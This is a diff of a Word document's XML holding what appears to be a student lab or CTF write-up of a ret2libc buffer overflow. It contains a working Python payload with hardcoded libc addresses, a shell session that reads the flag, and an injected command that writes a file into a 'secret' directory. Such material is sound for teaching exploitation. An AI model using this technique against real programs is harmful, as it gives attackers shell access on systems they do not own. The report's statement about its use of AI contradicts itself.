+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
         <w:t>payload += pack("&lt;I", 0xf7e07ec0) # exit func address. obtained with print exit</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
         <w:t>payload += pack("&lt;I", 0xf7f60363) # /bin/sh string address. obtained with grep "/bin/sh" (inside gdb ret2libc)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
         <w:t>sys.stdout.buffer.write(payload)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
         <w:t>'</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Zkladntext"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">The addresses were obtained during a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>gdb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> session with the ret2libc executable. In this session, and while putting a breakpoint on main and running the executable, we can use the command “print </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>func</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">” to print the addresses of the functions </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>system(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">) and </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>exit(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>), and with grep we can search string on the environment. In this case, we can use grep “/bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">” to find the address of that string and append that to the payload so we can load the bash. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Zkladntext"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">With the padding we can fill the buffer on the vuln function, and after that, and with the extra padding bytes, we can replace the return function to </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>system(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">) function. This function </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>is capable of executing</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> any bash command. In this case, we also overwrite the bytes after </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>exit(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">) function with a pointer to a bash terminal. With this overlapping, when we execute </w:t>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>ret2libc with the script we can access directly to a bash terminal and read the flag: NEVER_RETURN_TO_STANDARD_LIFE.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Zkladntext"/>
+        <w:pStyle w:val="BodyText"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">The addresses were obtained during a gdb session with the ret2libc executable. In this session, and while putting a breakpoint on main and running the executable, we can use the command “print func” to print the addresses of the functions system() and exit(), and with grep we can search strings on the environment. In this case, we can use grep “/bin/sh” to find the address of that string so we can reuse that same direction and append that to the payload in order to load the root bash session. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>With the padding we can fill the buffer on the vuln function, and after that, and with the extra padding bytes, we can replace the return function to system() function. This function is capable of executing any bash command. In this case, we also overwrite the bytes after exit() function with a pointer to a bash terminal. With this overlapping, when we execute ret2libc with the script we can access directly to a bash terminal and read the flag: NEVER_RETURN_TO_STANDARD_LIFE.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:rPr>
-          <w:lang/>
-        </w:rPr>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>./ret2libc</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="BBBBBB"/>
-          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -1272,14 +882,12 @@
         <w:rPr>
           <w:b/>
           <w:color w:val="008000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>$(</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>./solution.sh</w:t>
       </w:r>
@@ -1287,44 +895,38 @@
         <w:rPr>
           <w:b/>
           <w:color w:val="008000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Zkladntext"/>
+        <w:pStyle w:val="BodyText"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:rPr>
-          <w:lang/>
-        </w:rPr>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>bash-5.0$</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="BBBBBB"/>
-          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>ls</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Zkladntext"/>
+        <w:pStyle w:val="BodyText"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
         <w:rPr>
           <w:color w:val="BBBBBB"/>
@@ -1333,84 +935,73 @@
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>flag</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="BBBBBB"/>
-          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>ret2libc</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="BBBBBB"/>
-          <w:lang/>
         </w:rPr>
         <w:tab/>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>ret2libc.c</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="BBBBBB"/>
-          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>solution.sh</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="BBBBBB"/>
-          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>solution_grade.sh</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="BBBBBB"/>
-          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>t0p_s3cr3t</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Zkladntext"/>
+        <w:pStyle w:val="BodyText"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
         <w:rPr>
           <w:color w:val="BBBBBB"/>
@@ -1419,42 +1010,37 @@
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>bash-5.0$</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="BBBBBB"/>
-          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>cat</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="BBBBBB"/>
-          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>flag</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Zkladntext"/>
+        <w:pStyle w:val="BodyText"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
         <w:rPr>
           <w:color w:val="BBBBBB"/>
@@ -1463,372 +1049,330 @@
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>flag</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="666666"/>
-          <w:lang/>
         </w:rPr>
         <w:t>{</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>NEVER_RETURN_TO_STANDARD_LIFE</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="666666"/>
-          <w:lang/>
         </w:rPr>
         <w:t>}</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Zkladntext"/>
+        <w:pStyle w:val="BodyText"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:rPr>
-          <w:lang/>
-        </w:rPr>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>bash-5.0$</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="BBBBBB"/>
-          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="008000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>exit</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Zkladntext"/>
+        <w:pStyle w:val="BodyText"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="008000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>exit</w:t>
       </w:r>
       <w:r>
+        <w:rPr/>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">On task 2 is mostly the same, with the difference that instead of just calling the bash, we execute a series of bash command: “cd /home/user/t0p_s3cr3t &amp;&amp; touch owned &amp;&amp; echo 100 &gt; owned”. This command opens the directory, create the new file, and writes the number (in this case; 100) on the file. For this to work, we define this string as </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>a</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> environment variable with export COMMAND</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>=“</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">cd /home/user/t0p_s3cr3t &amp;&amp; touch owned &amp;&amp; echo 100 &gt; owned”, search for the address of this variable on </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>gdb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and replace /bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> with this new string that will create the new file.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t>TODO: We need blank space here idk why, later I will research.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:ind w:hanging="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">On </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>ask 2 is mostly the same, with the difference that instead of just calling the bash, we execute a series of bash command: “cd /home/user/t0p_s3cr3t &amp;&amp; touch owned &amp;&amp; echo 100 &gt; owned”. This command opens the directory, create the new file, and writes the number (in this case; 100) in the file. For this to work, we define this string as an environment variable with export COMMAND=“cd /home/user/t0p_s3cr3t &amp;&amp; touch owned &amp;&amp; echo 100 &gt; owned” (the name of the variable doesn’t matter), search for the address of this variable on gdb and replace /bin/sh with this new string that will create the new file.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:ind w:hanging="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>On the command we need extra space so the system() function can execute the command correctly without cutting of the command in between. This may be due to difference on the stack and environment between real execution of the script and gdb.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:lang/>
-        </w:rPr>
+        <w:ind w:hanging="0"/>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>python3</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="BBBBBB"/>
-          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>-c</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="BBBBBB"/>
-          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
         <w:t>'</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
         <w:t>import sys</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
         <w:t>from struct import pack # this makes easier to write addresses on little indian format</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
         <w:t>payload = b"A" * 112 # padding</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
         <w:t>payload += pack("&lt;I", 0xf7e15360) # system func address. obtained with print system (inside gdb ret2libc)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
         <w:t>payload += pack("&lt;I", 0xf7e07ec0) # exit func address. obtained with print exit</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+        </w:rPr>
         <w:t>#payload += pack("&lt;I", 0xf7f60363) # /bin/sh string address. obtained with grep "/bin/sh" (inside gdb ret2libc)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
         <w:t>payload += pack("&lt;I", 0xffffdeab) # on this address is the env variable COMMAND,</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
         <w:t># this variable is ="                      cd /home/user/t0p_s3cr3t &amp;&amp; touch owned &amp;&amp; echo 100 &gt; owned"</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
         <w:t># with four spaces so we can avoid unkown command on the system func</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
         <w:t>sys.stdout.buffer.write(payload)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
         <w:t>'</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
+        <w:pStyle w:val="Normal"/>
+        <w:ind w:hanging="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
         <w:t>Result:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:color w:val="BBBBBB"/>
         </w:rPr>
@@ -1836,203 +1380,193 @@
       <w:r>
         <w:rPr>
           <w:color w:val="008000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>cd</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="BBBBBB"/>
-          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>t0p_s3cr3t</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="BBBBBB"/>
-          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="666666"/>
-          <w:lang/>
         </w:rPr>
         <w:t>&amp;&amp;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="BBBBBB"/>
-          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>cat</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="BBBBBB"/>
-          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>owned</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:color w:val="666666"/>
-          <w:lang/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="666666"/>
-          <w:lang/>
         </w:rPr>
         <w:t>100</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Nadpis1"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
         <w:t>Use of Generative Artificial Intelligence</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>As a team we didn’t use any Generative A.I. tool in any of the thinking, writing or execution of the parts of this assignment nor documentation.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">The GenAI was used during the thinking and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>debuging</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> of Ret2Libc Practice logic by requesting the GenAI hints and tips for finishing the task. In any case the AI made the entire exercise alone (and the GenAI can’t do it anyways, as it activates the protection against hacking)</w:t>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="120"/>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>The GenAI was used during the debu</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>g</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">ging of Ret2Libc Practice logic by requesting the GenAI hints and tips for finishing the task. In any case the AI made the entire exercise alone (and the GenAI can’t do it anyways, as it activates the protection against hacking </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>guiding</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="even" r:id="rId13"/>
-      <w:headerReference w:type="default" r:id="rId14"/>
-      <w:footerReference w:type="even" r:id="rId15"/>
-      <w:footerReference w:type="default" r:id="rId16"/>
-      <w:headerReference w:type="first" r:id="rId17"/>
-      <w:footerReference w:type="first" r:id="rId18"/>
+      <w:headerReference w:type="even" r:id="rId5"/>
+      <w:headerReference w:type="default" r:id="rId6"/>
+      <w:headerReference w:type="first" r:id="rId7"/>
+      <w:footerReference w:type="even" r:id="rId8"/>
+      <w:footerReference w:type="default" r:id="rId9"/>
+      <w:footerReference w:type="first" r:id="rId10"/>
+      <w:type w:val="nextPage"/>
       <w:pgSz w:w="11906" w:h="16838"/>
-      <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="709" w:footer="709" w:gutter="567"/>
-      <w:cols w:space="708"/>
-      <w:formProt w:val="0"/>
+      <w:pgMar w:left="1418" w:right="1418" w:gutter="567" w:header="709" w:top="1418" w:footer="709" w:bottom="1418"/>
+      <w:pgNumType w:fmt="decimal"/>
+      <w:formProt w:val="false"/>
       <w:titlePg/>
-      <w:docGrid w:linePitch="360"/>
+      <w:textDirection w:val="lrTb"/>
+      <w:docGrid w:type="default" w:linePitch="360" w:charSpace="0"/>
     </w:sectPr>
   </w:body>
 </w:document>
 </file>
 
-<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
